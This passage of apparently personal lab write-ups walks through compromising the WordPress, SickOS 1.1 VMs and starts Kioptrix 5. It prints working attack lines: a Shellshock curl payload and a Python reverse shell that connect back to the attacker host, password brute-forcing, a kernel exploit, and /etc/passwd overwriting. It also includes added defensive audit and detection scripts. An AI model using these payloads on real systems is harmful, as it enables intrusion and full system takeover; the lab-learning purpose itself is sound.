 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://vtcsec/secret/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://vtcsec/secret/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.9 identified (Insecure, released on 2017-11-16).
 | Found By: Rss Generator (Passive Detection)
 |  - http://vtcsec/secret/index.php/feed/, <generator>https://wordpress.org/?v=4.9</generator>
 |  - http://vtcsec/secret/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.9</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://vtcsec/secret/wp-content/themes/twentyseventeen/
 | Last Updated: 2020-03-31T00:00:00.000Z
 | Readme: http://vtcsec/secret/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 2.3
 | Style URL: http://vtcsec/secret/wp-content/themes/twentyseventeen/style.css?ver=4.9
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.4 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://vtcsec/secret/wp-content/themes/twentyseventeen/style.css?ver=4.9, Match: 'Version: 1.4'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating All Themes (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:00:49 <==========================> (20900 / 20900) 100.00% Time: 00:00:49
[+] Checking Theme Versions (via Passive and Aggressive Methods)

[i] Theme(s) Identified:

[+] twentyfifteen
 | Location: http://vtcsec/secret/wp-content/themes/twentyfifteen/
 | Last Updated: 2020-03-31T00:00:00.000Z
 | Readme: http://vtcsec/secret/wp-content/themes/twentyfifteen/readme.txt
 | [!] The version is out of date, the latest version is 2.6
 | Style URL: http://vtcsec/secret/wp-content/themes/twentyfifteen/style.css
 | Style Name: Twenty Fifteen
 | Style URI: https://wordpress.org/themes/twentyfifteen/
 | Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, st...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://vtcsec/secret/wp-content/themes/twentyfifteen/, status: 500
 |
 | Version: 1.9 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://vtcsec/secret/wp-content/themes/twentyfifteen/style.css, Match: 'Version: 1.9'

[+] twentyseventeen
 | Location: http://vtcsec/secret/wp-content/themes/twentyseventeen/
 | Last Updated: 2020-03-31T00:00:00.000Z
 | Readme: http://vtcsec/secret/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 2.3
 | Style URL: http://vtcsec/secret/wp-content/themes/twentyseventeen/style.css
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Known Locations (Aggressive Detection)
 |  - http://vtcsec/secret/wp-content/themes/twentyseventeen/, status: 500
 |
 | Version: 1.4 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://vtcsec/secret/wp-content/themes/twentyseventeen/style.css, Match: 'Version: 1.4'

[+] twentysixteen
 | Location: http://vtcsec/secret/wp-content/themes/twentysixteen/
 | Last Updated: 2020-03-31T00:00:00.000Z
 | Readme: http://vtcsec/secret/wp-content/themes/twentysixteen/readme.txt
 | [!] The version is out of date, the latest version is 2.1
 | Style URL: http://vtcsec/secret/wp-content/themes/twentysixteen/style.css
 | Style Name: Twenty Sixteen
 | Style URI: https://wordpress.org/themes/twentysixteen/
 | Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthead ...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://vtcsec/secret/wp-content/themes/twentysixteen/, status: 500
 |
 | Version: 1.4 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://vtcsec/secret/wp-content/themes/twentysixteen/style.css, Match: 'Version: 1.4'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <==========================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://vtcsec/secret/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Mon May 4 07:24:53 2020
[+] Requests Done: 20932
[+] Cached Requests: 47
[+] Data Sent: 4.849 MB
[+] Data Received: 3.127 MB
[+] Memory used: 264.789 MB
[+] Elapsed time: 00:01:06
Next, look for admin's password.
(snip)
[+] Performing password attack on Wp Login against 1 user/s
Trying admin / loulou Time: 00:00:22 <> (1331 / 14344391) 0.00%  ETA: 67:32:
Trying admin / candy1 Time: 00:00:22 <> (1333 / 14344391) 0.00%  ETA: 67:28:
Trying admin / tequieromucho Time: 00:00:23 <> (1400 / 14344391) 0.00%  ETA: 67:53
Trying admin / liverpoolfc Time: 00:00:30 <> (1784 / 14344391) 0.01%  ETA: 67:56:1
Trying admin / babykoh
Trying admin / admin Time: 00:05:59 <=========================================> (19820 / 19820) 100.00% Time: 00:05:59
[SUCCESS] - admin / admin

[!] Valid Combinations Found:
 | Username: admin, Password: admin
(snip)
admin was simply left at the default.
So log in with admin/admin.
I couldn't work out a straightforward file upload, so I overwrite an existing file instead.
In my case: Appearance > Editor, then search.php under Theme Files.
Near the end of it I appended Kali's
/usr/share/webshells/php/php-reverse-shell.php
with the IP and port changed to my own listener.
Now pressing the Search button on the WordPress site fires the reverse shell.
Overwriting 404.php would have worked just as well, but I didn't know which path to request to trigger it.
Wait on the listener, press the button, and it arrives.

# nc -nlvp 8080
(push [search])
Linux vtcsec 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 09:07:25 up  7:28,  0 users,  load average: 0.00, 0.00, 0.03
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
After getting a shell
victim
$ uname -a
Linux vtcsec 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
attacker
# searchsploit linux ubuntu 16.04
----------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                               |  Path
                                                                             | (/usr/share/exploitdb/)
----------------------------------------------------------------------------- ----------------------------------------
(snip)
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalatio | exploits/linux/local/45010.c
(snip)
# cp /usr/share/exploitdb/exploits/linux/local/45010.c 45010.c
# python -m SimpleHTTPServer 80
victim
$ cd /tmp
$ wget 10.10.10.3/45010.c
--2020-05-04 09:01:46--  http://10.10.10.3/45010.c
Connecting to 10.10.10.3:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13728 (13K) [text/plain]
Saving to: '45010.c'
0K .......... ...  100% 14.6M=0.001s
2020-05-04 09:01:46 (14.6 MB/s) - '45010.c' saved [13728/13728]
$ gcc 45010.c
$ ./a.out
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
There seem to be several kernel exploits, but I picked the one that looked most certain to work.
privcheck
# cp /usr/bin/unix-privesc-check pric
Apparently Kali Linux ships a handy program that does privilege checks for you, so I tried it.
Send it to the victim and run it.
victim
$ ./pric detailed | grep WARNING
passwd: Permission denied.
Search the output below for the word 'WARNING'.  If you don't see it then
WARNING: /etc/passwd is a critical config file. World write is set for /etc/passwd
(snip)
It kept spewing output without end, so I just picked the most interesting item at the top.
It turns out that in this environment "/etc/passwd" can be modified without being root.
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ cp /etc/passwd /tmp/passwd
$ openssl passwd -1 password
$1$n.m2eSNO$znpjjJIvqy12UiYDL6G90/
$ echo "root:\$1\$7Y7rVxIM\$pZaXFk7OlTVsq3X2aMiAM.:0:0:root:/root:/bin/bash" > /etc/passwd
$ cat /tmp/passwd >> /etc/passwd
$ su -
su: must be run from a terminal
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@vtcsec:/tmp$ su -
su -
Password: password
root@vtcsec:~# id
id
uid=0(root) gid=0(root) groups=0(root)
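From the defender's side, the condition unix-privesc-check warned about can be audited directly. The following is an added example (not part of the original write-up) that checks the file mode of /etc/passwd and its contents for the three things the session above relies on: write access for non-root users, a password hash placed directly in the passwd file, and duplicate or extra UID-0 entries. The sample text is constructed to mirror the state after the edit.

```python
"""Audit /etc/passwd for world/group write access, unshadowed password
hashes and duplicate or extra UID-0 entries. Added example, not from the
original post; SAMPLE is constructed."""
import os
import stat
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    severity: str
    message: str


# crypt(3) prefixes that mark a real hash, as opposed to "x", "*" or "!"
HASH_PREFIXES = ("$1$", "$2a$", "$2b$", "$2y$", "$5$", "$6$", "$y$")
SHADOWED = ("x", "*", "!", "!!", "")


def mode_findings(mode, path="/etc/passwd"):
    """Flag group/world write bits on a file mode (os.stat().st_mode)."""
    out = []
    if mode & stat.S_IWOTH:
        out.append(Finding("critical", f"{path} is world-writable"))
    if mode & stat.S_IWGRP:
        out.append(Finding("high", f"{path} is group-writable"))
    return out


def content_findings(text):
    """Check the entries themselves; text is the content of the file."""
    out, first_seen, uid0 = [], {}, []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7 or not fields[2].isdigit():
            out.append(Finding("high", f"line {lineno}: malformed entry"))
            continue
        name, pw, uid = fields[0], fields[1], int(fields[2])
        if name in first_seen:
            # getpwnam() returns the first match, so a prepended entry wins
            out.append(Finding("critical",
                               f"line {lineno}: duplicate user {name!r} "
                               f"(first at line {first_seen[name]})"))
        else:
            first_seen[name] = lineno
        if pw not in SHADOWED:
            sev = "critical" if pw.startswith(HASH_PREFIXES) else "high"
            out.append(Finding(sev, f"line {lineno}: password field of "
                                    f"{name!r} is not shadowed"))
        if uid == 0:
            uid0.append(name)
    if len(uid0) > 1:
        out.append(Finding("critical",
                           f"{len(uid0)} UID-0 entries: {', '.join(uid0)}"))
    return out


def audit_passwd(path="/etc/passwd"):
    """Run both checks against a real file."""
    st = os.stat(path)
    with open(path, encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    return mode_findings(st.st_mode, path) + content_findings(text)


# Constructed sample: a root entry carrying a hash was prepended to the
# original file, exactly the shape produced by the echo/cat sequence above.
SAMPLE = """root:$1$n.m2eSNO$znpjjJIvqy12UiYDL6G90/:0:0:root:/root:/bin/bash
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
"""

if __name__ == "__main__":
    # 0o100666 is the mode reported for a world-writable regular file
    for f in mode_findings(0o100666) + content_findings(SAMPLE):
        print(f"[{f.severity}] {f.message}")
```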
Wrap-up
- Is wpscan faster than hydra for WordPress dictionary attacks?
- 404.php was at "http://vtcsec/secret/wp-content/themes/twentyseventeen/404.php".
vulnhub SickOS 1.1 notes
SickOS 1.1
Importing from the OVF failed. Creating a new VM and attaching the existing hard disk works.
Service enumeration
# nmap -p- 10.10.10.9 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-01 23:25 EDT Nmap scan report for 10.10.10.9 Host is up (0.00074s latency). Not shown: 65532 filtered ports PORT STATE SERVICE 22/tcp open ssh 3128/tcp open squid-http 8080/tcp closed http-proxy MAC Address: 08:00:27:3C:37:E6 (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 118.00 seconds # nmap -p22,3128,8080 -sV -version-all 10.10.10.9 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-01 23:28 EDT Nmap scan report for 10.10.10.9 Host is up (0.00086s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0) 3128/tcp open http-proxy Squid http proxy 3.1.19 8080/tcp closed http-proxy MAC Address: 08:00:27:3C:37:E6 (Oracle VirtualBox virtual NIC) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 25.47 seconds
Points of interest
- [port 22 ssh] OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0): probably nothing here
- [port 3128 http-proxy] Squid http proxy 3.1.19: I forgot this was a proxy and actually struggled because of it
Details
[port 22 ssh] OpenSSH 5.9p1
Nothing in particular. Nothing I could find.
[port 3128 http-proxy] Squid http proxy 3.1.19
There doesn't seem to be an exploit for Squid itself?
All access to SickOS 1.1's web services has to go through the proxy on port 3128.
# nikto -h 10.10.10.9 -useproxy 10.10.10.9:3128 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 10.10.10.9 + Target Hostname: 10.10.10.9 + Target Port: 80 + Proxy: 10.10.10.9:3128 + Start Time: 2020-05-02 11:33:08 (GMT-4) --------------------------------------------------------------------------- + Server: Apache/2.2.22 (Ubuntu) + Retrieved via header: 1.0 localhost (squid/3.1.19) + Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.21 + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + Uncommon header 'x-cache-lookup' found, with contents: MISS from localhost:3128 + Uncommon header 'x-cache' found, with contents: MISS from localhost + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + Server may leak inodes via ETags, header found with file /robots.txt, inode: 265381, size: 45, mtime: Fri Dec 4 19:35:02 2015 + Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch. + Server banner has changed from 'Apache/2.2.22 (Ubuntu)' to 'squid/3.1.19' which may suggest a WAF, load balancer or proxy is in place + Uncommon header 'x-squid-error' found, with contents: ERR_INVALID_URL 0 + Uncommon header 'tcn' found, with contents: list + Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php + Uncommon header '93e4r0-cve-2014-6271' found, with contents: true + OSVDB-112004: /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278). 
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives. + 8674 requests: 0 error(s) and 15 item(s) reported on remote host + End Time: 2020-05-02 11:33:58 (GMT-4) (50 seconds) --------------------------------------------------------------------------- + 1 host(s) tested # dirb http://10.10.10.9 -p 10.10.10.9:3128 ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Sat May 2 11:43:27 2020 URL_BASE: http://10.10.10.9/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt PROXY: 10.10.10.9:3128 ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://10.10.10.9/ ---- + http://10.10.10.9/cgi-bin/ (CODE:403|SIZE:286) + http://10.10.10.9/connect (CODE:200|SIZE:109) + http://10.10.10.9/index (CODE:200|SIZE:21) + http://10.10.10.9/index.php (CODE:200|SIZE:21) + http://10.10.10.9/robots (CODE:200|SIZE:45) + http://10.10.10.9/robots.txt (CODE:200|SIZE:45) + http://10.10.10.9/server-status (CODE:403|SIZE:291) ----------------- END_TIME: Sat May 2 11:43:36 2020 DOWNLOADED: 4612 - FOUND: 7
There are lots of interesting things here.
Found something that looks promising for the Apache + PHP 5.3.10 combination:
# searchsploit apache php 5.3 ----------------------------------------------------------------------------- ---------------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) ----------------------------------------------------------------------------- ---------------------------------------- Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution + Scanner | exploits/php/remote/29316.py Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution | exploits/php/remote/29290.c ----------------------------------------------------------------------------- ---------------------------------------- Shellcodes: No Result Papers: No Result
The exploit code as-is apparently wasn't general enough for the proxied case?
About CVE-2014-6271 and CVE-2014-6278
Apparently this is something called Shellshock.
# curl --proxy 10.10.10.9:3128 http://10.10.10.9/cgi-bin/status
{ "uptime": " 21:41:52 up 1:10, 0 users, load average: 0.00, 0.01, 0.05", "kernel": "Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux"}
In this case, querying "/cgi-bin/status" returns what looks like the output of a couple of commands.
Being able to do OS command injection here is ShellShock!
By the way, dirb didn't pick up "/cgi-bin/status".
In short, bash has a bug in how it parses function definitions passed in through the environment, and that parsing can be hijacked.
# curl -H "U: () { :;}; echo ; echo ;/bin/bash -c id;" --proxy 10.10.10.9:3128 http://10.10.10.9/cgi-bin/status
uid=33(www-data) gid=33(www-data) groups=33(www-data)
In this case it doesn't matter which header you send to "/cgi-bin/status": as long as the value is one that hijacks the parsing, OS command injection is possible.
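The signature of such a request is the same whichever header carries it: the value begins with "() {", the marker a vulnerable bash accepts as an exported function definition. The following is an added example (not part of the original write-up) that flags that prefix in request headers and in Apache combined-format log lines; the headers and log lines are constructed.

```python
"""Detect Shellshock-style (CVE-2014-6271 family) probes against a CGI
endpoint. Added example, not from the original post; the sample headers
and log lines are constructed."""
import re

# A vulnerable bash treated any environment variable whose value starts
# with "() {" as a function definition and kept executing what followed the
# closing brace. CGI turns every request header into such a variable
# (HTTP_U, HTTP_USER_AGENT, ...), so the header name is irrelevant.
SHELLSHOCK_RE = re.compile(r"^\s*\(\)\s*\{")


def shellshock_headers(headers):
    """Return the names of request headers whose value looks like a payload.
    headers is a name -> value mapping as a WAF or reverse proxy sees it."""
    return [name for name, value in headers.items() if SHELLSHOCK_RE.search(value)]


# Apache "combined" LogFormat:
#   host ident user [time] "request" status bytes "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)


def scan_combined_log(lines):
    """Return (host, request, field) for each line whose Referer or
    User-Agent carries the prefix. Only those two headers reach the combined
    log, so a payload in a custom header (like "U:" above) is invisible
    here and needs header-level inspection at the proxy or a WAF."""
    hits = []
    for line in lines:
        m = COMBINED_RE.match(line)
        if not m:
            continue
        for field in ("referer", "agent"):
            if SHELLSHOCK_RE.search(m.group(field)):
                hits.append((m.group("host"), m.group("request"), field))
    return hits


# Constructed sample log: one benign hit, one probe, one unrelated request.
SAMPLE_LOG = [
    '10.10.10.3 - - [02/May/2020:11:33:08 -0400] "GET /cgi-bin/status HTTP/1.1" '
    '200 197 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '10.10.10.3 - - [02/May/2020:11:34:10 -0400] "GET /cgi-bin/status HTTP/1.1" '
    '200 54 "-" "() { :;}; /bin/bash -c id"',
    '10.10.10.3 - - [02/May/2020:11:35:01 -0400] "GET /robots.txt HTTP/1.1" '
    '200 45 "-" "curl/7.68.0"',
]

if __name__ == "__main__":
    # constructed request, modelled on the curl invocation above
    print(shellshock_headers({"Host": "10.10.10.9",
                              "U": "() { :;}; echo ; echo ;/bin/bash -c id;"}))
    print(scan_combined_log(SAMPLE_LOG))
```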
window 1
# rlwrap nc -nlvp 443
window 2
# curl -H "U: () { :;}; echo ; echo ;/bin/bash -c bash -i >& /dev/tcp/10.10.10.3/443 0>&1;" --proxy 10.10.10.9:3128 http://10.10.10.9/cgi-bin/status
window 1
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python -c "import pty;pty.spawn('/bin/bash')"
www-data@SickOs:/usr/lib/cgi-bin$
reverse-shell!
robots.txt
Accessing it gives:
User-agent: *
Disallow: /
Dissalow: /wolfcms
So let's look at this "wolfcms" thing.
Looks like some kind of homepage.
Found a login page at "http://10.10.10.9/wolfcms/?/admin/login".
Unbelievably, you can log in with user: admin, password: admin.
After logging in there is, conveniently, an "Upload file" button.
Nothing for it but to place reverse.php there.
window 1
# rlwrap nc -nlvp 8080
window 2
# curl --proxy 10.10.10.9:3128 http://10.10.10.9/wolfcms/public/reverse.php
window 1
Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
23:34:51 up 3:03, 0 users, load average: 0.00, 0.01, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
After the reverse shell
connect.py
Look into "connect.py", which had actually caught my eye in the earlier dirb output.
www-data@SickOs:/usr/lib/cgi-bin$ cd /var/www
cd /var/www
www-data@SickOs:/var/www$ ls
ls
connect.py  index.php  robots.txt  wolfcms
www-data@SickOs:/var/www$ cat connect.py
cat connect.py
#!/usr/bin/python
print "I Try to connect things very frequently\n"
print "You may want to try my services"
Connects frequently? More and more suspicious.
Looking at cron made clear what this was about.
www-data@SickOs:/var/www$ ls -al /etc/cron.d
ls -al /etc/cron.d
total 20
drwxr-xr-x  2 root root 4096 Dec  5  2015 .
drwxr-xr-x 90 root root 4096 May  3 20:31 ..
-rw-r--r--  1 root root  102 Jun 20  2012 .placeholder
-rw-r--r--  1 root root   52 Dec  5  2015 automate
-rw-r--r--  1 root root  544 Jul  2  2015 php5
www-data@SickOs:/var/www$ cat /etc/cron.d/automate
cat /etc/cron.d/automate
* * * * * root /usr/bin/python /var/www/connect.py
So, tampering with "connect.py", which is run periodically as root, gets root.
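The weak link is not the cron entry but the ownership of the file it runs. The following is an added example (not part of the original write-up) that parses /etc/cron.d-style entries and, for every job run as root, reports referenced paths that a non-root user owns or can write to, including their parent directory. The cron text and the fake file metadata are constructed so it runs without touching the real system; pass the default stat function to audit a live host.

```python
"""Find root cron jobs whose command references a file a non-root user
could replace. Added example, not from the original post; SAMPLE_CRON and
FAKE_FS are constructed."""
import os
import posixpath
import re
import shlex
import stat
from collections import namedtuple

FileInfo = namedtuple("FileInfo", "uid mode")


def real_stat(path):
    """Owner and mode of a real file (default backend)."""
    st = os.stat(path)
    return FileInfo(st.st_uid, st.st_mode)


def parse_cron_d(text):
    """Return (schedule, user, command) for each job in /etc/cron.d syntax,
    where the sixth field is the user. Comments, blanks and VAR=value
    assignments are skipped; @reboot-style shortcuts are handled."""
    jobs = []
    for line in text.splitlines():
        s = line.strip()
        if not s or s.startswith("#") or re.match(r"^[A-Za-z_]\w*\s*=", s):
            continue
        if s.startswith("@"):
            parts = s.split(None, 2)
            if len(parts) == 3:
                jobs.append((parts[0], parts[1], parts[2]))
        else:
            parts = s.split(None, 6)
            if len(parts) == 7:
                jobs.append((" ".join(parts[:5]), parts[5], parts[6]))
    return jobs


def weak_points(info):
    """Reasons a non-root user could alter the object described by info."""
    reasons = []
    if info.uid != 0:
        reasons.append(f"owned by uid {info.uid}")
    if info.mode & stat.S_IWGRP:
        reasons.append("group-writable")
    if info.mode & stat.S_IWOTH:
        reasons.append("world-writable")
    return reasons


def audit_cron_d(text, stat_fn=real_stat):
    """For each root job, check every absolute path on its command line and
    the directory holding it. Returns (path, reasons, command) tuples."""
    findings = []
    for _schedule, user, command in parse_cron_d(text):
        if user != "root":
            continue
        try:
            tokens = shlex.split(command)
        except ValueError:
            tokens = command.split()
        for tok in tokens:
            if not tok.startswith("/"):
                continue
            try:
                reasons = weak_points(stat_fn(tok))
            except FileNotFoundError:
                findings.append((tok, ["does not exist"], command))
                continue
            parent = posixpath.dirname(tok)
            try:
                # a writable parent allows replacing the file by rename
                reasons += [f"parent {parent} {r}" for r in weak_points(stat_fn(parent))]
            except FileNotFoundError:
                pass
            if reasons:
                findings.append((tok, reasons, command))
    return findings


# Constructed sample mirroring /etc/cron.d/automate on the box above.
SAMPLE_CRON = """# m h dom mon dow user command
SHELL=/bin/sh
* * * * * root /usr/bin/python /var/www/connect.py
"""

# Constructed file metadata: connect.py is owned by www-data (uid 33).
FAKE_FS = {
    "/usr/bin": FileInfo(0, 0o040755),
    "/usr/bin/python": FileInfo(0, 0o100755),
    "/var/www": FileInfo(0, 0o040755),
    "/var/www/connect.py": FileInfo(33, 0o100644),
}


def fake_stat(path):
    if path not in FAKE_FS:
        raise FileNotFoundError(path)
    return FAKE_FS[path]


if __name__ == "__main__":
    for path, reasons, command in audit_cron_d(SAMPLE_CRON, fake_stat):
        print(f"{path}: {', '.join(reasons)}  <- {command}")
```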
attacker
# cat getroot.py
#! /usr/bin/env python
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.3",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
root@kali:~/EXattack/Vulunhub/SickOS1-1# python -m SimpleHTTPServer 80
victim
www-data@SickOs:/tmp$ cd /tmp
cd /tmp
www-data@SickOs:/tmp$ wget 10.10.10.3/getroot.py
wget 10.10.10.3/getroot.py
--2020-05-03 23:12:22--  http://10.10.10.3/getroot.py
Connecting to 10.10.10.3:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 238 [text/plain]
Saving to: `getroot.py'
100%[======================================>] 238 --.-K/s in 0s
2020-05-03 23:12:22 (17.2 MB/s) - `getroot.py' saved [238/238]
www-data@SickOs:/tmp$ cp /tmp/getroot.py /var/www/connect.py
cp /tmp/getroot.py /var/www/connect.py
attacker # nc -nlvp 8080
Now just wait for "connect.py" to run.
Once it does, root.
attacker # id uid=0(root) gid=0(root) groups=0(root)
Extras
# cd /root
# ls
a0216ea4d51874464078c618298b1367.txt
# cat a0216ea4d518^?
cat: a0216ea4d518: No such file or directory
# cat *.txt
If you are viewing this!!
ROOT!
You have Succesfully completed SickOS1.1.
Thanks for Trying
There was also this:
# dirb http://10.10.10.9/wolfcms -p 10.10.10.9:3128 ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Sun May 3 13:49:54 2020 URL_BASE: http://10.10.10.9/wolfcms/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt PROXY: 10.10.10.9:3128 ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://10.10.10.9/wolfcms/ ---- + http://10.10.10.9/wolfcms/composer (CODE:200|SIZE:403) + http://10.10.10.9/wolfcms/config (CODE:200|SIZE:0) ==> DIRECTORY: http://10.10.10.9/wolfcms/docs/ + http://10.10.10.9/wolfcms/favicon.ico (CODE:200|SIZE:894) + http://10.10.10.9/wolfcms/index (CODE:200|SIZE:3975) + http://10.10.10.9/wolfcms/index.php (CODE:200|SIZE:3975) ==> DIRECTORY: http://10.10.10.9/wolfcms/public/ + http://10.10.10.9/wolfcms/robots (CODE:200|SIZE:0) + http://10.10.10.9/wolfcms/robots.txt (CODE:200|SIZE:0) ---- Entering directory: http://10.10.10.9/wolfcms/docs/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.10.10.9/wolfcms/public/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ----------------- END_TIME: Sun May 3 13:50:01 2020 DOWNLOADED: 4612 - FOUND: 7 # dirb http://10.10.10.9/cgi-bin -p 10.10.10.9:3128 ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Sun May 3 13:50:10 2020 URL_BASE: http://10.10.10.9/cgi-bin/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt PROXY: 10.10.10.9:3128 ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://10.10.10.9/cgi-bin/ ---- + http://10.10.10.9/cgi-bin/status (CODE:200|SIZE:197) ----------------- END_TIME: Sun May 3 13:50:17 2020 DOWNLOADED: 4612 - FOUND: 1
End
Look carefully at cron, httpd.conf and .htaccess.
vulnhub Kioptrix 5 (1.4) notes
kioptrix 5(1-4)
Without thinking, I did what I always do and attached the disk as IDE afterwards without creating a virtual disk, but it wouldn't boot.
In addition to the originally distributed image (.vmdk), download *fix.zip.
Create the VM from the "*.vbox" contained in *fix.zip, delete the storage that is already attached, and add the "*.vmdk" again as IDE.
After that, as shown in the image included in *fix.zip, type ufs:/dev/ada0p2 at the "mountroot>" prompt that appears after starting the VM, and it boots.
pentest
Service enumeration
